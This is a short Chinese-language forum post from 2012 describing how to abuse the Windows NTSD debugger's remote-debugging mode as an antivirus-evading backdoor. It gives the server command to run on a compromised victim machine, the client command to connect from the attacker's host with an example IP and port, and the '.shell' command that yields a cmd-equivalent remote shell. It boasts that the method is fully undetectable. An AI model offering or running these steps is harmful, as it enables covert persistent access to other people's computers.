微软的“后门”Ntsd的远程调试功能利用

[复制链接]
查看278 | 回复0 | 2012-4-1 19:24:45 | 显示全部楼层 |阅读模式
1.肉鸡上运行:ntsd-servertcp:port=端口要调试的程序(可以任意,只要存在即可),例如:ntsd-servertcp:port=99calc.exe,会新弹出个窗口,并监听刚才设置端口。

2.本机运行:ntsd-remotetcp:server=IP,port=端口,例如:ntsd-remotetcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时server端(就是第一步监听的那个)会显示:0:000>COMPUTER\netbar(tcp192.168.1.3,port99)connectedatFriMay0613:49:592011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。

3.输入:.shell,取得shell,操作和Cmd完全一样,权限是服务端运行ntsd.exe的用户权限。

又是个留后门的好方法,全免杀,而且永不被杀……
这个其实是NTSD.exe的正常功能,远程调试功能,更多说明自己谷歌搜索,这是一个windows命令行下的调试工具,功能十分强大。
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则